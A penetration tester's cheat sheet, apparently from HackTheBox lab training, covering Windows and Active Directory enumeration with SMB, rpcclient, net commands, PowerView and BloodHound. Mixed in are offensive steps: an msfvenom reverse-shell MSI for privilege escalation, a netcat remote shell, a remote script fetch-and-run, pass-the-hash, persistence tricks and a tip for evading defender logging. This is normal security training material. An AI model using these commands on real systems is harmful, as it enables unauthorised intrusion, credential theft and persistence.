Enumeration

Passive Network Enumeration

#Use Wireshark to captire either ARP or MDNS traffic (GUI)
Intrusionz3r0X@htb[/htb]$ sudo -E wireshark

#Use tcpdump to capture trafic
Intrusionz3r0X@htb[/htb]$ sudo tcpdump -i ens224 -w capture.pcap

#Read the capture.pcap and filter by IP
Intrusionz3r0X@htb[/htb]$ tshark -r capture.pcap -Y "arp" | grep -oP "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" | sort -u

#Analyze traffic by using responder (no poisoning)
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens224 -A

Active Network Enumeration

#Host Discovery
Intrusionz3r0X@htb[/htb]$ fping -asgq <range>
Intrusionz3r0X@htb[/htb]$ nmap -sn -n <range>

#Host Discovery
C:\>  for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

#DNS enumeration
Intrusionz3r0X@htb[/crto]$ dig cyberbotic.io
Intrusionz3r0X@htb[/crto]$ whois 172.67.205.143
Intrusionz3r0X@htb[/crto]$ ./dnscan.py -d cyberbotic.io -w subdomains-100.txt

Default Writeable Folders

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp

SMB

#Enumeration using enum4linux-ng
Intrusionz3r0X@htb[/htb]$ enum4linux-ng 10.10.11.45 -A -C

#SMBMAP
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\\test.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash

#SMBClient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes

#Auth by kerberos
Intrusionz3r0X@htb[/htb]$ export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k

#Download recursive mode
smb: \\Path\\to\\folder\\> prompt off
smb: \\Path\\to\\folder\\> recurse true
smb: \\Path\\to\\folder\\> mget <folder>

Mount shared folder on Windows

#Mount shared folder
C:\\htb> net use n: \\\\192.168.220.129\\Finance #/user:plaintext Password123
PS C:\\htb> New-PSDrive -Name "N" -Root "\\\\192.168.220.129\\Finance" -PSProvider "FileSystem"

#Mount SMB with creds
PS C:\\htb> $username = 'intrusionz3r0'
PS C:\\htb> $password = 'Password123'
PS C:\\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\\htb> New-PSDrive -Name "N" -Root "\\\\192.168.220.129\\Finance" -PSProvider "FileSystem" -Credential $cre

Mount shared folder on Linux

#sudo apt install cifs-utils.
Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
#intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
**CredentialFile:**
username=plaintext
password=Password123
domain=.

Manual SMB Enumeration

#List shared Folder
C:\\htb> dir \\\\192.168.220.129\\Finance\\
PS C:\\htb> Get-ChildItem \\\\192.168.220.129\\Finance\\

#Search for a specific word in the filename.
C:\\htb>dir n:\\*cred* /s /b
C:\\htb>dir n:\\*secret* /s /b
PS C:\\htb> Get-ChildItem -Recurse -Path N:\\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred*

#Search for a specific word within the content of the files.
c:\\htb> findstr /s /i cred n:\\*.*
PS C:\\htb> Get-ChildItem -Recurse -Path N:\\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred

mkdir C:\temp
net share temp=C:\temp /grant:everyone,full

RPCClient

Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\\n' $i)" | grep "User Name\\|user_rid\\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128

Query

Description

srvinfo

Server information.

enumdomains

Enumerate all domains that are deployed in the network.

querydominfo

Provides domain, server, and user information of deployed domains.

netshareenumall

Enumerates all available shares.

netsharegetinfo <share>

Provides information about a specific share.

enumdomusers

Enumerates all domain users.

queryuser <RID>

Provides information about a specific user.

querygroup <RID>

Provides information about a specific group.

Monitoring for Process On windows

PS C:\\htb> IEX (iwr '<http://10.10.10.205/procmon.ps1>') 

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

List installed programs

PS C:\\htb> $INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\\htb> $INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\\htb> $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Am I Alone?

PS C:\\htb> qwinsta

Always Install Elevated

#Enumerating Always Install Elevated Settings
PS C:\\htb> reg query HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer
PS C:\\htb> reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
#Generating MSI Package
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
#Executng MSI
C:\\htb> msiexec /i c:\\users\\htb-student\\desktop\\aie.msi /quiet /qn /norestart

Enumerate Remote Privilege Access

#Check Remote Desktop acesss
PS C:\\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

#Check PSRemote access (winrm)
PS C:\\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
Bloodhound query: `MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2`


#SQL Server Admin remote access
Bloodhound Query: `MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2`

Authentication

#PSExec
impacket-psexec inlanefreight.local/wley:'transporter@4'@172.16.5.125
#Windows Management Instrumentation (more stealthy approach)
impacket-wmiexec inlanefreight.local/wley:'transporter@4'@172.16.5.5

#Impersonate user
$user = '<domain>\\<user>'
$password = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user,$password)
Invoke-Command -ComputerName '<computer-name>' -Credential $Cred -ScriptBlock { C:\\Temp\\netcat.exe -e cmd <ip> <port>}

Network Information

#Lists all known hosts stored in the arp table.
PS C:\> arp -a

#Prints out adapter settings for the host.
PS C:\> ipconfig /all

#Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
PS C:\> route print

#Displays the status of the host's firewall. We can determine if it is active and filtering traffic.
PS C:\> netsh advfirewall show state

Windows Managment Instrumentation WMI

#Prints the patch level and description of the Hotfixes applied
PS C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn

#Displays basic host information
PS C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

#A listing of all processes on host
PS C:\> wmic process list /format:list

#Displays information about the Domain and Domain Controllers
PS C:\> wmic ntdomain list /format:list

#Displays information about all local accounts
PS C:\> wmic useraccount list /format:list

#Information about all local groups
PS C:\> wmic group list /format:list

#Dumps information about any system accounts that are being used as service accounts.
PS C:\> wmic sysaccount list /format:list

Additional useful commands: xorrior

Net Commands

Net Commands Trick

If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing net1 instead of net will execute the same functions without the potential trigger from the net string.

#Information about password requirements
PS C:\> net accounts

#Password and lockout policy
PS C:\> net accounts /domain

#Information about domain groups
PS C:\> net group /domain

#List users with domain admin privileges
PS C:\> net group "Domain Admins" /domain

#List of PCs connected to the domain
PS C:\> net group "domain computers" /domain

#List PC accounts of domain controllers
PS C:\> net group "Domain Controllers" /domain

#User that belongs to the group
PS C:\> net group <domain_group_name> /domain

#List of domain groups
PS C:\> net groups /domain

#All available groups
PS C:\> net localgroup

#List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
PS C:\> net localgroup administrators /domain

#Information about a group (admins)
PS C:\> net localgroup administrators

#Add user to administrators
PS C:\> net localgroup administrators [username] /add

#Check current shares
PS C:\> net share

#Get information about a user within the domain
PS C:\> net user <ACCOUNT_NAME> /domain

#List all users of the domain
PS C:\> net user /domain

#Information about the current user
PS C:\> net user %username%

#Mount the share locally
PS C:\> net use X: \\computer\share

#Get a list of computers
PS C:\> net view

#Shares on the domains
PS C:\> net view /all /domain[:domainname]

#List shares of a computer
PS C:\> net view \\computer /ALL

#List of PCs of the domain
PS C:\> net view /domain

PowerShell CMDLED

#Discover Modules
PS C:\\htb> Get-Module

#Load AD module
PS C:\\htb> Import-Module ActiveDirectory

#Get Domain Info
PS C:\\htb> Get-ADDomain

#Checking for trust relationships
PS C:\\htb> Get-ADTrust -Filter *

#Get-ADUser listing of accounts that may be susceptible to a Kerberoasting attack
PS C:\\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

#Group enumeration,detailed information
PS C:\\htb> Get-ADGroup -Filter * | select name
PS C:\\htb> Get-ADGroup -Identity "Backup Operators"
#List the group members
PS C:\\htb> Get-ADGroupMember -Identity "Backup Operators"

#Testing for Local Admin Access with the current user
PS C:\\htb> Test-AdminAccess -ComputerName ACADEMY-EA-MS01

Tools

Bloodhound

Check them out

first degree object control
Group delegated object control items.

#Executing bloodhound On Linux
Intrusionz3r0X@htb[/htb]$ sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
Intrusionz3r0X@htb[/htb]$ zip -r ilfreight_bh.zip *.json
Intrusionz3r0X@htb[/htb]$ sudo neo4j start
Intrusionz3r0X@htb[/htb]$ bloodhound

#Execute bloodhound against a specific domain
Intrusionz3r0X@htb[/htb]$ bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

sudo neo4j console

#Executin bloodhound On Windows
PS C:\\htb> .\\SharpHound.exe -c All --zipfilename ILFREIGHT
Type bloodhound into a CMD or PowerShell console

Bloodhound Community Edition

sudo apt-get install docker-compose -y
sudo mkdir /opt/bloodhound
cd /opt/bloodhound 
sudo wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz 
sudo tar -xzf ./bloodhound-cli-linux-amd64.tar.gz 
sudo rm bloodhound-cli-linux-amd64.tar.gz
sudo ./bloodhound-cli install

sudo ./bloodhound-cli containers stop #This will stop our containers
sudo ./bloodhound-cli containers start #This will start our containers

Adding INLANEFREIGHT.LOCAL Information to /etc/resolv.conf

Intrusionz3r0X@htb[/htb]$ cat /etc/resolv.conf 

# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.

#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5

BloodHound Cypher Cheatsheethausec

Powerview

Users

#Get info about a user
PS C:\\htb> Get-NetUser -UserName student107 
#List All Users
PS Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount 
#All disabled users
Get-NetUser -UACFilter ACCOUNTDISABLE 
#Domain admins kerberostable
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}

Groups

PS C:\\htb> Get-NetGroup #Get groups
PS C:\\htb> Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
PS C:\\htb> Get-NetGroup 'Domain Admins' #Get all data of a group
PS C:\\htb> Get-NetGroup -UserName "myusername" #Get groups of a user

Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)

# Recursive Group Membership to know who to target for potential elevation of privileges.
PS C:\\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Computers

Get-DomainComputer -Properties DnsHostName # Get all domain maes of computers
Get-NetComputer #Get all computer objects
Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation

Logon and Session

Get-NetSession -ComputerName <servername> #Get active sessions on the host
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)

Retrieved Domain SID

(Get-ADDomain)

Powerfull Powerview Commands

# Recursive Group Membership to know who to target for potential elevation of privileges.
PS C:\\htb>  Get-DomainGroupMember -Identity "Domain Admins" -Recurse

#ASREPRoastable users
PS C:\\htb>  Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

#Kerberoastable users
PS C:\\htb> Get-NetUser -SPN | select samaccountname,userprincipalname,useraccountcontrol | fl
PS C:\\DotNetNuke\\Portals\\0> Get-DomainUser * -SPN -verbose |  Get-DomainSPNTicket -Format Hashcat | Export-Csv .\\ilfreight_spns.csv -NoTypeInformation

# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
# Users with this flag might have empty passwords (if allowed) or shorter passwords
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

#Persistence
#Asreproast
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true
#Kerberosting
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose 
Get-ADUser -Filter 'Name -like "Jorden"' | Set-ADAccountControl -doesnotrequirepreauth $false

#Finding Passwords in the Description Field using Get-Domain User
Get-DomainUser * | Select-Object samaccountname, userprincipalname, useraccountcongtrol, description | Where-Object {$_.Description -ne $null} | fl
 
#All disabled users
Get-NetUser -UACFilter ACCOUNTDISABLE 

#Retrieve *most* users who can perform DC replication for inlanefreight.local (i.e. DCsync)
Get-ObjectAcl "dc=dc=inlanefreight,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll'

PreviousWindows Penetration Testing NextCredentials Attacks On Windows

Last updated 5 months ago